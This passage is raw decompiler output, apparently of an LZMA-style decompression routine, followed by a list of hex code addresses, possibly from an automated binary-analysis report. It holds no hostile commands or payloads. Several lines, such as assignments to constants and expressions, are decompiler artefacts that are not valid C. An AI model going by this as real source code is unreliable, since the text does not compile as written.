												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                                            0x00000000
                                            0x004064dd
                                            0x004064dd
                                            0x004064e1
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x00406840
                                            0x00406840
                                            0x00406843
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x00000000
                                            0x00000000
                                            0x00406891
                                            0x00406895
                                            0x00406a44
                                            0x00406a5a
                                            0x00406a62
                                            0x00406a69
                                            0x00406a6b
                                            0x00406a72
                                            0x00406a76
                                            0x00406a76
                                            0x004068a1
                                            0x004068a8
                                            0x004068b0
                                            0x004068b3
                                            0x004068b6
                                            0x004068b6
                                            0x004068bc
                                            0x004068bc
                                            0x00406058
                                            0x00406058
                                            0x00406058
                                            0x00406061
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00000000
                                            0x00406072
                                            0x00000000
                                            0x00000000
                                            0x0040607b
                                            0x0040607e
                                            0x00406081
                                            0x00406085
                                            0x00000000
                                            0x00000000
                                            0x0040608b
